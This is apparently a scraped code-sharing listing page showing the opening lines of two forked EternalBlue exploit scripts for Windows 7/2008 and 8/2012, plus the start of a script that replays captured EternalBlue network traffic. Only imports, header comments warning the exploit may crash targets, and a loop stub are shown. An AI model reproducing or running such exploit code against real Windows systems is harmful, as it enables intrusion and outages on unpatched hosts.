Skip to content

Instantly share code, notes, and snippets.

@und3fined
und3fined / eternalblue8_exploit.py
Created May 22, 2017 15:27 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@und3fined
und3fined / eternalblue7_exploit.py
Created May 22, 2017 15:18 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
import socket
import time
import ast
def main():
backlog = open("eternalblue.replay").read().split("\n\n")
backlog = [ast.literal_eval(i) for i in backlog]
connections = []
start = time.monotonic()
for i in backlog: